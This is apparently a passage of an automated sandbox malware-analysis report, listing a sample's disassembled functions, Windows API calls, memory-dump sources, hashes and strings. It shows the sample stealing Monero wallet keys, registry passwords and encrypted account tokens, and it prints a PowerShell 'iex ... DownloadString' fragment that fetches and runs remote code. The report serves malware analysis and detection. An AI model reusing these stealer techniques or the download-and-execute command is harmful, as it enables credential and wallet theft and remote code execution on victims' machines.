                    • Part of subcall function 002E9AC0: LocalFree.KERNEL32(?,?,?,?,002E4EEE,00000000,?), ref: 002E9B3F
                  • lstrcat.KERNEL32(?,00000000), ref: 002F44A3
                  • StrCmpCA.SHLWAPI(?,003008D1), ref: 002F44C0
                  • lstrcat.KERNEL32(00000000,00000000), ref: 002F44D2
                  • lstrcat.KERNEL32(00000000,?), ref: 002F44E5
                  • lstrcat.KERNEL32(00000000,00300FB8), ref: 002F44F4
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                  • String ID:
                  • API String ID: 3541710228-0
                  • Opcode ID: 87c9f2529efd6835c7d7df09de57e03ec5ab96beed1be8ef914270b2d9743162
                  • Instruction ID: 9f73014124db7ec70133ada5d47f2e1b2ba499392f77ac1b3cbd381d7aa81e6b
                  • Opcode Fuzzy Hash: 87c9f2529efd6835c7d7df09de57e03ec5ab96beed1be8ef914270b2d9743162
                  • Instruction Fuzzy Hash: A67167B6910208ABDB14FBA0DC95FFEB379AF58300F4045A8F605A7181EA74DB59CF91
                  APIs
                    • Part of subcall function 002E12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 002E12B4
                    • Part of subcall function 002E12A0: RtlAllocateHeap.NTDLL(00000000), ref: 002E12BB
                    • Part of subcall function 002E12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 002E12D7
                    • Part of subcall function 002E12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 002E12F5
                    • Part of subcall function 002E12A0: RegCloseKey.ADVAPI32(?), ref: 002E12FF
                  • lstrcat.KERNEL32(?,00000000), ref: 002E134F
                  • lstrlen.KERNEL32(?), ref: 002E135C
                  • lstrcat.KERNEL32(?,.keys), ref: 002E1377
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                    • Part of subcall function 002FA9B0: lstrlen.KERNEL32(?,01328BA0,?,\Monero\wallet.keys,00300E17), ref: 002FA9C5
                    • Part of subcall function 002FA9B0: lstrcpy.KERNEL32(00000000), ref: 002FAA04
                    • Part of subcall function 002FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002FAA12
                    • Part of subcall function 002FA8A0: lstrcpy.KERNEL32(?,00300E17), ref: 002FA905
                    • Part of subcall function 002F8B60: GetSystemTime.KERNEL32(00300E1A,01329C18,003005AE,?,?,002E13F9,?,0000001A,00300E1A,00000000,?,01328BA0,?,\Monero\wallet.keys,00300E17), ref: 002F8B86
                    • Part of subcall function 002FA920: lstrcpy.KERNEL32(00000000,?), ref: 002FA972
                    • Part of subcall function 002FA920: lstrcat.KERNEL32(00000000), ref: 002FA982
                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 002E1465
                    • Part of subcall function 002FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002FA7E6
                    • Part of subcall function 002E99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E99EC
                    • Part of subcall function 002E99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 002E9A11
                    • Part of subcall function 002E99C0: LocalAlloc.KERNEL32(00000040,?), ref: 002E9A31
                    • Part of subcall function 002E99C0: ReadFile.KERNEL32(000000FF,?,00000000,002E148F,00000000), ref: 002E9A5A
                    • Part of subcall function 002E99C0: LocalFree.KERNEL32(002E148F), ref: 002E9A90
                    • Part of subcall function 002E99C0: CloseHandle.KERNEL32(000000FF), ref: 002E9A9A
                  • DeleteFileA.KERNEL32(00000000), ref: 002E14EF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                  • API String ID: 3478931302-218353709
                  • Opcode ID: 790383cf05a7020f97398057918822b0bf8af8d89cfe0de07f365e3d726a837d
                  • Instruction ID: cc3e64108f063e2b6cfc28407b6a0c60f2663e8db399746b7c67d4104c9fce36
                  • Opcode Fuzzy Hash: 790383cf05a7020f97398057918822b0bf8af8d89cfe0de07f365e3d726a837d
                  • Instruction Fuzzy Hash: 215120B196011957CB15EB60DD92AEDB33CAF54740F4041B8B70A62091EE706B9ACEA6
                  APIs
                    • Part of subcall function 002E72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 002E733A
                    • Part of subcall function 002E72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 002E73B1
                    • Part of subcall function 002E72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 002E740D
                    • Part of subcall function 002E72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 002E7452
                    • Part of subcall function 002E72D0: HeapFree.KERNEL32(00000000), ref: 002E7459
                  • lstrcat.KERNEL32(00000000,003017FC), ref: 002E7606
                  • lstrcat.KERNEL32(00000000,00000000), ref: 002E7648
                  • lstrcat.KERNEL32(00000000, : ), ref: 002E765A
                  • lstrcat.KERNEL32(00000000,00000000), ref: 002E768F
                  • lstrcat.KERNEL32(00000000,00301804), ref: 002E76A0
                  • lstrcat.KERNEL32(00000000,00000000), ref: 002E76D3
                  • lstrcat.KERNEL32(00000000,00301808), ref: 002E76ED
                  • task.LIBCPMTD ref: 002E76FB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                  • String ID: :
                  • API String ID: 2677904052-3653984579
                  • Opcode ID: 453d9772eb43b2704f28d88fd4024e7860d093b3c917eae077b7ee35c0118e79
                  • Instruction ID: ca73b758eb7d291b7d61d7eeb88d2e0a42187133ddb9a9e00f399f16605ac8fa
                  • Opcode Fuzzy Hash: 453d9772eb43b2704f28d88fd4024e7860d093b3c917eae077b7ee35c0118e79
                  • Instruction Fuzzy Hash: 0D318772D20109DBCB19EBA5DC95EFE7378AF55301B504018F106A7290CB34AA5BDF62
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0132EA38,00000000,?,00300E2C,00000000,?,00000000), ref: 002F8130
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002F8137
                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 002F8158
                  • __aulldiv.LIBCMT ref: 002F8172
                  • __aulldiv.LIBCMT ref: 002F8180
                  • wsprintfA.USER32 ref: 002F81AC
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                  • String ID: %d MB$@
                  • API String ID: 2774356765-3474575989
                  • Opcode ID: e354c33b4622efad88d7362a8ca821de552cfa65eee70b0a5af80e8b619acc93
                  • Instruction ID: ce513f3b60ec6cfc6b13d84ba25582003d27e321e39a54cfa0d8203525d3d2fd
                  • Opcode Fuzzy Hash: e354c33b4622efad88d7362a8ca821de552cfa65eee70b0a5af80e8b619acc93
                  • Instruction Fuzzy Hash: F42127B1E54208ABDB10DFD4CC49FAEF7B8EB48B40F104219F705AB280D7B869158BA5
                  APIs
                    • Part of subcall function 002FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002FA7E6
                    • Part of subcall function 002E47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 002E4839
                    • Part of subcall function 002E47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 002E4849
                  • InternetOpenA.WININET(00300DF7,00000001,00000000,00000000,00000000), ref: 002E610F
                  • StrCmpCA.SHLWAPI(?,0132F360), ref: 002E6147
                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 002E618F
                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 002E61B3
                  • InternetReadFile.WININET(?,?,00000400,?), ref: 002E61DC
                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 002E620A
                  • CloseHandle.KERNEL32(?,?,00000400), ref: 002E6249
                  • InternetCloseHandle.WININET(?), ref: 002E6253
                  • InternetCloseHandle.WININET(00000000), ref: 002E6260
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                  • String ID:
                  • API String ID: 2507841554-0
                  APIs
                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 002E733A
                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 002E73B1
                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 002E740D
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 002E7452
                  • HeapFree.KERNEL32(00000000), ref: 002E7459
                  • task.LIBCPMTD ref: 002E7555
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • API ID: Heap$EnumFreeOpenProcessValuetask
                  • String ID: Password
                  • API String ID: 775622407-3434357891
                  APIs
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                    • Part of subcall function 002FA9B0: lstrlen.KERNEL32(?,01328BA0,?,\Monero\wallet.keys,00300E17), ref: 002FA9C5
                    • Part of subcall function 002FA9B0: lstrcpy.KERNEL32(00000000), ref: 002FAA04
                    • Part of subcall function 002FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002FAA12
                    • Part of subcall function 002FA920: lstrcpy.KERNEL32(00000000,?), ref: 002FA972
                    • Part of subcall function 002FA920: lstrcat.KERNEL32(00000000), ref: 002FA982
                    • Part of subcall function 002FA8A0: lstrcpy.KERNEL32(?,00300E17), ref: 002FA905
                    • Part of subcall function 002FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002FA7E6
                  • lstrlen.KERNEL32(00000000), ref: 002EBC9F
                    • Part of subcall function 002F8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 002F8E52
                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 002EBCCD
                  • lstrlen.KERNEL32(00000000), ref: 002EBDA5
                  • lstrlen.KERNEL32(00000000), ref: 002EBDB9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                  • API String ID: 3073930149-1079375795
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • API ID: ExitProcess$DefaultLangUser
                  • String ID: *
                  • API String ID: 1494266314-163128923
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 002E4FCA
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002E4FD1
                  • InternetOpenA.WININET(00300DDF,00000000,00000000,00000000,00000000), ref: 002E4FEA
                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 002E5011
                  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 002E5041
                  • InternetCloseHandle.WININET(?), ref: 002E50B9
                  • InternetCloseHandle.WININET(?), ref: 002E50C6
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                  • String ID:
                  • API String ID: 3066467675-0
                  APIs
                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 002F8426
                  • wsprintfA.USER32 ref: 002F8459
                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 002F847B
                  • RegCloseKey.ADVAPI32(00000000), ref: 002F848C
                  • RegCloseKey.ADVAPI32(00000000), ref: 002F8499
                    • Part of subcall function 002FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002FA7E6
                  • RegQueryValueExA.ADVAPI32(00000000,0132E948,00000000,000F003F,?,00000400), ref: 002F84EC
                  • lstrlen.KERNEL32(?), ref: 002F8501
                  • RegQueryValueExA.ADVAPI32(00000000,0132E9D8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00300B34), ref: 002F8599
                  • RegCloseKey.ADVAPI32(00000000), ref: 002F8608
                  • RegCloseKey.ADVAPI32(00000000), ref: 002F861A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                  • String ID: %s\%s
                  • API String ID: 3896182533-4073750446
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 002F76A4
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002F76AB
                  • RegOpenKeyExA.ADVAPI32(80000002,0131BB98,00000000,00020119,00000000), ref: 002F76DD
                  • RegQueryValueExA.ADVAPI32(00000000,0132E9C0,00000000,00000000,?,000000FF), ref: 002F76FE
                  • RegCloseKey.ADVAPI32(00000000), ref: 002F7708
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID: Windows 11
                  • API String ID: 3225020163-2517555085
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 002F7734
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002F773B
                  • RegOpenKeyExA.ADVAPI32(80000002,0131BB98,00000000,00020119,002F76B9), ref: 002F775B
                  • RegQueryValueExA.ADVAPI32(002F76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 002F777A
                  • RegCloseKey.ADVAPI32(002F76B9), ref: 002F7784
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID: CurrentBuildNumber
                  • API String ID: 3225020163-1022791448
                  APIs
                  • CreateFileA.KERNEL32(:/,80000000,00000003,00000000,00000003,00000080,00000000,?,002F3AEE,?), ref: 002F92FC
                  • GetFileSizeEx.KERNEL32(000000FF,:/), ref: 002F9319
                  • CloseHandle.KERNEL32(000000FF), ref: 002F9327
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • API ID: File$CloseCreateHandleSize
                  • String ID: :/$:/
                  • API String ID: 1378416451-70439090
                  APIs
                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E99EC
                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 002E9A11
                  • LocalAlloc.KERNEL32(00000040,?), ref: 002E9A31
                  • ReadFile.KERNEL32(000000FF,?,00000000,002E148F,00000000), ref: 002E9A5A
                  • LocalFree.KERNEL32(002E148F), ref: 002E9A90
                  • CloseHandle.KERNEL32(000000FF), ref: 002E9A9A
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                  • String ID:
                  • API String ID: 2311089104-0
                  • Opcode ID: f9ac84b32661048a62fd9931ad6e57c3f5c9c8bbe26346536e90d5a65bcead32
                  • Instruction ID: 02e19689857a25931b2fe1c7feef3b3be67e4c7ffdb69b884a0c9b5eefa40c7b
                  • Opcode Fuzzy Hash: f9ac84b32661048a62fd9931ad6e57c3f5c9c8bbe26346536e90d5a65bcead32
                  • Instruction Fuzzy Hash: EB315CB4A1020AEFDB24CF95D885BAE77B4FF48340F108169E901A7390D774A995CFA1
                  APIs
                  • lstrcat.KERNEL32(?,0132ED20), ref: 002F47DB
                    • Part of subcall function 002F8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 002F8E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 002F4801
                  • lstrcat.KERNEL32(?,?), ref: 002F4820
                  • lstrcat.KERNEL32(?,?), ref: 002F4834
                  • lstrcat.KERNEL32(?,0131B338), ref: 002F4847
                  • lstrcat.KERNEL32(?,?), ref: 002F485B
                  • lstrcat.KERNEL32(?,0132E4D8), ref: 002F486F
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                    • Part of subcall function 002F8D90: GetFileAttributesA.KERNEL32(00000000,?,002E1B54,?,?,0030564C,?,?,00300E1F), ref: 002F8D9F
                    • Part of subcall function 002F4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 002F4580
                    • Part of subcall function 002F4570: RtlAllocateHeap.NTDLL(00000000), ref: 002F4587
                    • Part of subcall function 002F4570: wsprintfA.USER32 ref: 002F45A6
                    • Part of subcall function 002F4570: FindFirstFileA.KERNEL32(?,?), ref: 002F45BD
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                  • String ID:
                  • API String ID: 2540262943-0
                  • Opcode ID: c539344408f285a276005811de6263ea926e8ec74062af9a2f647f094c1467b9
                  • Instruction ID: b13ea087e34c51ea523993ddb60625d017146602187c91062e933d20953c1f28
                  • Opcode Fuzzy Hash: c539344408f285a276005811de6263ea926e8ec74062af9a2f647f094c1467b9
                  • Instruction Fuzzy Hash: 493150B691020CA7CB21FBB0DC85EFDB378AF58740F404599B319A6081EEB4D69D8F95
                  APIs
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                    • Part of subcall function 002FA9B0: lstrlen.KERNEL32(?,01328BA0,?,\Monero\wallet.keys,00300E17), ref: 002FA9C5
                    • Part of subcall function 002FA9B0: lstrcpy.KERNEL32(00000000), ref: 002FAA04
                    • Part of subcall function 002FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002FAA12
                    • Part of subcall function 002FA920: lstrcpy.KERNEL32(00000000,?), ref: 002FA972
                    • Part of subcall function 002FA920: lstrcat.KERNEL32(00000000), ref: 002FA982
                    • Part of subcall function 002FA8A0: lstrcpy.KERNEL32(?,00300E17), ref: 002FA905
                  • ShellExecuteEx.SHELL32(0000003C), ref: 002F2D85
                  Strings
                  • <, xrefs: 002F2D39
                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 002F2CC4
                  • ')", xrefs: 002F2CB3
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 002F2D04
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp
